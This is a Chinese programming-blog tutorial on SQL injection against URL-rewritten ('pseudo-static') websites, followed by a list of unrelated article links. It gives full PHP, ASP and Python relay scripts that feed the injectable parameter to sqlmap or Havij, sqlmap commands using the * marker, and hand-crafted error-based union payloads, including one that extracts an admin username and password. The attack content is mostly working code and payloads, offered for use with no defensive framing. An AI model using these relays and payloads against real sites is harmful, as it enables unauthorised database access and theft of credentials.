编程 PHP

PHP针对伪静态的注入总结【附asp与Python相关代码】

Posted in PHP onAugust 01, 2017

本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考，具体如下：

一：中转注入法

1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了
http://www.xxx.com/news.php/id/1.html

2.测试步骤：

中转注入的php代码:inject.php

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(” “,”%20″,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = "http://www.xxx.com/news.php/id/$id.html";
$url = "http://www.xxx.com/news.php/id/$id.html";
//echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

3.本地环境搭建PHP，然后访问http://127.0.0.1/inject.php?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码：

<%
JmdcwName=request("id")
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://192.168.235.7:8808/ad/blog/"  //实际上要请求的网址
JMUrl=JMUrl & JmStr&".html"    //拼接url
response.write JMUrl&JmStr    //我这里故意输出url来看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=""
JmCok=replace(JmCok,chr(32),"%20") 
JmStr=URLEncoding(JmStr)  
response.write  PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串，cookie，referer字段
Function PostData(PostUrl,PostStr,PostCok,PostRef)  
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)   //处理返回的信息
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function URLEncoding(vstrin)    //发包前对参数的url编码一下
strReturn=""
Dim i
'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
'vstrin=Replace(vstrin,chr(43),"%2B")  'JMDCW增加转换+字符
vstrin=Replace(vstrin,chr(32),"/**/")  '在此增加要过滤的代码 //这里很关键，方便啊，把空格自动换成/**/，后面会说到的
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function
%>

二、手工注入法

1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html

2.测试注入：

http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http://www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html
http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常
http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错

3.看页面是否存在差异，相同则不存在，不同存在注入。

4.联合查询：

http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html
http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

手工注入法（二）

http://www.xxx.net/news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注：

伪静态的注入和URL的普通GET注入不太相同

。普通url的get注入的%20,%23,+等都可以用；但是伪静态不行，会被直接传递到到url中，所以用/**/这个注释符号表示空格。

三、SQLmap方法

在sqlmap中伪静态哪儿存在注入点就加*
http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www.xxx.com/news/class/?103.htm
python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”

四、python脚本方法

代码：

from BaseHTTPServer import *
import urllib2
class MyHTTPHandler(BaseHTTPRequestHandler):
 def do_GET(self):
  path=self.path
  path=path[path.find('id=')+3:]
  proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})
  opener = urllib2.build_opener(proxy_support)
  urllib2.install_opener(opener)
  url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
  try:
   response=urllib2.urlopen(url+path)
   html=response.read()
  except urllib2.URLError,e:
   html=e.read()
  self.wfile.write(html)
server = HTTPServer(("", 8000), MyHTTPHandler)
server.serve_forever()

希望本文所述对大家PHP程序设计有所帮助。

PHP针对伪静态的注入总结【附asp与Python相关代码】

- Author -

无法自拔

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php入门小知识

Mar 24 PHP

php session应用实例登录验证

Mar 16 PHP

hessian 在PHP中的使用介绍

Dec 13 PHP

解析php入库和出库

Jun 25 PHP

PHP文件读写操作相关函数总结

Nov 18 PHP

php 输出json及显示json中的中文汉字详解及实例

Nov 09 PHP

php实时倒计时功能实现方法详解

Feb 27 PHP

Laravel学习教程之IOC容器的介绍与用例

Aug 15 PHP

php微信开发之谷歌测距

Jun 14 PHP

PHP getNamespaces()函数讲解

Feb 03 PHP

Laravel框架集成UEditor编辑器的方法图文与实例详解

Apr 17 PHP

PHP使用Session实现上传进度功能详解

Aug 06 PHP

Laravel 的数据库迁移的方法

Jul 31 #PHP

PHP实现webshell扫描文件木马的方法

Jul 31 #PHP

PHP/ThinkPHP实现批量打包下载文件的方法示例

Jul 31 #PHP

Thinkphp结合AJAX长轮询实现PC与APP推送详解

Jul 31 #PHP

php实现将二维关联数组转换成字符串的方法详解

Jul 31 #PHP

微信接口生成带参数的二维码

Jul 31 #PHP

PHP判断一个数组是另一个数组子集的方法详解

Jul 31 #PHP

You might like

php5数字型字符串加解密代码

2008/04/24 PHP

浅谈PHP的反射机制

2016/12/15 PHP

Mootools 1.2教程选项卡效果（Tabs）

2009/09/15 Javascript

JavaScript Cookie的读取和写入函数

2009/12/08 Javascript

js字符串的各种格式的转换 ToString，Format

2011/08/08 Javascript

关于jQuery UI 使用心得及技巧

2012/10/10 Javascript

jquery 卷帘效果实现代码(不同方向)

2013/02/05 Javascript

laytpl 精致巧妙的JavaScript模板引擎

2014/08/29 Javascript

Javascript基础知识（三）BOM，DOM总结

2014/09/29 Javascript

Javascript基础教程之switch语句

2015/01/18 Javascript

JavaScript使用cookie记录临时访客信息的方法

2015/04/07 Javascript

javascript实现的多个层切换效果通用函数实例

2015/07/06 Javascript

Jquery-1.9.1源码分析系列（十一）之DOM操作

2015/11/25 Javascript

jQuery插件实现带圆点的焦点图片轮播切换

2016/01/18 Javascript

基于bootstrap-datetimepicker.js不支持IE8的快速解决方法

2016/11/07 Javascript

通过Ajax使用FormData对象无刷新上传文件方法

2016/12/08 Javascript

深入理解vue中slot与slot-scope的具体使用

2018/01/26 Javascript

使用react render props实现倒计时的示例代码

2018/12/06 Javascript

JavaScript中的连续赋值问题实例分析

2019/07/12 Javascript

微信小程序跨页面传递data数据方法解析

2019/12/13 Javascript

解决vue axios跨域 Request Method: OPTIONS问题(预检请求)

2020/08/14 Javascript

JavaScript 判断浏览器是否是IE

2021/02/19 Javascript

Python中用于检查英文字母大写的isupper()方法

2015/05/19 Python

python中通过预先编译正则表达式提高效率

2017/09/25 Python

Django实现分页功能

2018/07/02 Python

python中selenium操作下拉滚动条的几种方法汇总

2019/07/14 Python

Python求解正态分布置信区间教程

2019/11/20 Python

英国手机零售商：Metrofone

2019/03/18 全球购物

四下基层实施方案

2014/03/28 职场文书

篝火晚会策划方案

2014/05/16 职场文书

党的作风建设心得体会

2014/10/22 职场文书

经理助理岗位职责

2015/02/02 职场文书

公司员工奖惩制度

2015/08/04 职场文书

2016领导干部廉洁自律心得体会

2016/01/13 职场文书

全面盘点MySQL中的那些重要日志文件

2021/11/27 MySQL

Python OpenGL基本配置方式

2022/05/20 Python